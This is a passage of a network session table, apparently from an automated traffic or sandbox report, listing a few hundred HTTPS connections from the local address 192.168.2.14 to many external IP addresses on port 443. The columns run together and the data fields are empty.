                                              18859192.168.2.1440356111.233.210.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18860192.168.2.145805247.102.39.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18861192.168.2.144758496.186.131.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18862192.168.2.144979844.221.168.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18863192.168.2.1440822169.222.182.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18864192.168.2.1447976132.120.252.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18865192.168.2.1446030191.73.107.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18866192.168.2.1436712161.172.90.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18867192.168.2.145236431.62.51.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18868192.168.2.144381046.89.237.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18869192.168.2.145431839.3.153.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18870192.168.2.144754482.55.215.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18871192.168.2.143887834.130.192.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18872192.168.2.1441112219.75.74.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18873192.168.2.1434406132.231.209.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18874192.168.2.1442218177.193.198.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18875192.168.2.145569881.30.98.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18876192.168.2.145202261.231.136.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18877192.168.2.145630435.196.15.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18878192.168.2.143367883.124.178.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18879192.168.2.145739889.55.78.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18880192.168.2.1440000109.231.44.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18881192.168.2.1455916186.250.185.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18882192.168.2.1432772189.97.33.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18883192.168.2.1439194179.69.116.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18884192.168.2.1442586199.42.119.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18885192.168.2.1459570142.251.2.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18886192.168.2.1455570111.157.3.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18887192.168.2.1433598164.119.204.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18888192.168.2.1458254177.154.64.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18889192.168.2.1446468146.251.145.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18890192.168.2.145930645.116.56.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18891192.168.2.1452822131.115.30.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18892192.168.2.144732673.191.131.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18893192.168.2.1447160156.58.89.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18894192.168.2.1456452135.5.113.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18895192.168.2.144439693.85.213.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18896192.168.2.144941049.253.15.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18897192.168.2.1455746138.135.148.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18898192.168.2.1438498129.218.27.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18899192.168.2.146051017.245.232.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18900192.168.2.1440734175.5.204.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18901192.168.2.145655691.156.170.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18902192.168.2.143946879.251.58.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18903192.168.2.1460666108.52.97.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18904192.168.2.1460528193.185.155.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18905192.168.2.1456602159.253.59.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18906192.168.2.1457908221.33.156.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18907192.168.2.1441656190.236.14.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18908192.168.2.143853417.95.190.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18909192.168.2.14373004.18.9.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18910192.168.2.1433594157.148.197.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18911192.168.2.143506685.37.84.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18912192.168.2.144481035.108.146.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18913192.168.2.145211675.197.188.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18914192.168.2.1441896154.221.221.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18915192.168.2.145830263.195.1.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18916192.168.2.1454604104.210.58.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18917192.168.2.1439798156.93.115.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18918192.168.2.144605671.64.163.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18919192.168.2.145388463.176.44.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18920192.168.2.1449606173.122.16.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18921192.168.2.144863284.6.94.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18922192.168.2.143731859.51.208.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18923192.168.2.143504652.99.98.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18924192.168.2.1454794170.245.196.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18925192.168.2.145459235.101.193.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18926192.168.2.1451248217.159.100.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18927192.168.2.1440568180.33.199.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18928192.168.2.1434404184.83.152.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18929192.168.2.1443928125.66.137.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18930192.168.2.1445522194.32.17.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18931192.168.2.144414874.53.206.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18932192.168.2.144698859.73.156.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18933192.168.2.144604663.246.123.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18934192.168.2.1446134135.13.243.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18935192.168.2.14406128.182.201.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18936192.168.2.143545061.24.181.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18937192.168.2.145425645.154.136.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18938192.168.2.1435242173.125.135.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18939192.168.2.1442428209.171.26.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18940192.168.2.145357073.96.110.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18941192.168.2.1454442154.210.25.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18942192.168.2.1436402202.85.132.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18943192.168.2.143619879.2.241.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18944192.168.2.143463065.89.59.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18945192.168.2.1441114144.152.2.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18946192.168.2.145778218.85.214.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18947192.168.2.1456062144.244.231.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18948192.168.2.144872487.45.232.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18949192.168.2.143865037.3.124.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18950192.168.2.145091272.117.146.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18951192.168.2.145896043.62.85.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18952192.168.2.1438974203.131.18.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18953192.168.2.144625489.99.227.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18954192.168.2.144935454.30.171.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18955192.168.2.145520687.119.180.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18956192.168.2.144510867.226.162.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18957192.168.2.1447720176.142.116.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18958192.168.2.1448134178.22.243.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18959192.168.2.1451976194.46.194.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18960192.168.2.145345453.69.41.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18961192.168.2.143628257.9.57.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18962192.168.2.1456574112.83.23.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18963192.168.2.146011874.85.243.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18964192.168.2.1459066183.241.149.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18965192.168.2.143330241.119.129.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18966192.168.2.1442928172.11.74.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18967192.168.2.144535079.132.220.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18968192.168.2.1439234204.104.252.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18969192.168.2.143699643.217.69.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18970192.168.2.145469066.106.8.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18971192.168.2.1438350199.70.151.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18972192.168.2.143513273.168.112.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18973192.168.2.1438740170.69.111.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18974192.168.2.1447988196.174.80.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18975192.168.2.144285489.236.174.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18976192.168.2.1440104191.232.157.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18977192.168.2.1450256135.8.229.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18978192.168.2.1441590104.156.220.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18979192.168.2.1436796164.226.112.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18980192.168.2.1435484136.205.201.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18981192.168.2.145043025.17.26.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18982192.168.2.1449134129.32.180.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18983192.168.2.1453486155.28.203.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18984192.168.2.1452986141.35.243.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18985192.168.2.1445910203.218.220.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18986192.168.2.1446662161.252.176.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18987192.168.2.1442896150.214.226.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18988192.168.2.1451732123.2.12.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18989192.168.2.1435234173.79.194.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18990192.168.2.145371835.103.73.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18991192.168.2.146037477.48.52.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18992192.168.2.1436372200.23.30.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18993192.168.2.144511886.58.217.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18994192.168.2.1446428165.250.43.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18995192.168.2.1443640204.102.195.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18996192.168.2.143829060.222.152.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18997192.168.2.145610491.18.123.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18998192.168.2.1432926157.65.34.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18999192.168.2.1460024151.163.187.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19000192.168.2.1447496213.207.161.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19001192.168.2.1449328143.124.174.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19002192.168.2.143322612.170.66.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19003192.168.2.145512476.208.202.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19004192.168.2.1434076110.71.138.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19005192.168.2.1458544122.57.105.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19006192.168.2.1452480147.58.98.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19007192.168.2.144350879.85.65.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19008192.168.2.1460350117.194.242.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19009192.168.2.1433564161.28.71.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19010192.168.2.1437220205.27.175.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19011192.168.2.1438404218.98.45.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19012192.168.2.144540232.221.235.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19013192.168.2.1457670124.91.54.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19014192.168.2.1456008156.8.125.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19015192.168.2.1459760203.4.47.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19016192.168.2.1436108155.204.1.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19017192.168.2.1443754221.238.173.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19018192.168.2.145945899.215.17.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19019192.168.2.1439604190.116.43.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19020192.168.2.1455614182.253.76.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19021192.168.2.143317296.35.248.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19022192.168.2.144572862.160.126.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19023192.168.2.1453600140.88.223.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19024192.168.2.1436308152.97.207.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19025192.168.2.145309257.172.220.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19026192.168.2.1446114142.20.68.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19027192.168.2.1455092134.170.197.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19028192.168.2.1434138112.84.211.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19029192.168.2.1450518221.20.56.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19030192.168.2.1459956153.55.221.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19031192.168.2.1453644160.131.241.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19032192.168.2.1452372192.125.113.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19033192.168.2.1453336199.158.117.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19034192.168.2.1436328109.237.7.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19035192.168.2.1453828125.54.54.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19036192.168.2.145707839.20.235.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19037192.168.2.144528849.8.168.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19038192.168.2.1439296176.90.159.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19039192.168.2.145336632.161.44.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19040192.168.2.145521631.231.206.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19041192.168.2.145737049.238.252.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19042192.168.2.1442320106.136.252.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19043192.168.2.144959664.101.142.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19044192.168.2.1460588169.246.69.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19045192.168.2.1455756179.80.213.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19046192.168.2.1437324150.232.165.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19047192.168.2.144401865.203.141.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19048192.168.2.145269824.189.202.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19049192.168.2.1446196114.38.242.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19050192.168.2.14595728.55.143.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19051192.168.2.1451874166.75.200.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19052192.168.2.144591676.37.243.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19053192.168.2.1452068177.80.235.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19054192.168.2.143870472.223.102.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19055192.168.2.1433262168.229.195.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19056192.168.2.1449036142.226.147.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19057192.168.2.144914012.214.48.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19058192.168.2.1459668129.134.109.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19059192.168.2.1449528143.52.30.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19060192.168.2.14344928.162.248.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19061192.168.2.1459804135.82.28.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19062192.168.2.144895644.75.95.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19063192.168.2.1444904110.7.70.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19064192.168.2.1450732142.28.167.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19065192.168.2.143456071.6.165.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19066192.168.2.1434384177.24.153.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19067192.168.2.1459598120.149.66.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19068192.168.2.1459564111.52.181.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19069192.168.2.145507290.116.183.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19070192.168.2.143585294.239.89.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19071192.168.2.1453112118.76.211.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19072192.168.2.1457842195.101.12.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19073192.168.2.1434574221.208.26.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19074192.168.2.143666268.242.35.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19075192.168.2.1459014160.14.175.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19076192.168.2.1437502150.242.171.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19077192.168.2.1450854107.20.114.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19078192.168.2.145052684.197.2.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19079192.168.2.1455506218.121.110.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19080192.168.2.1446614104.224.207.14443
                                              TimestampBytes transferredDirectionData


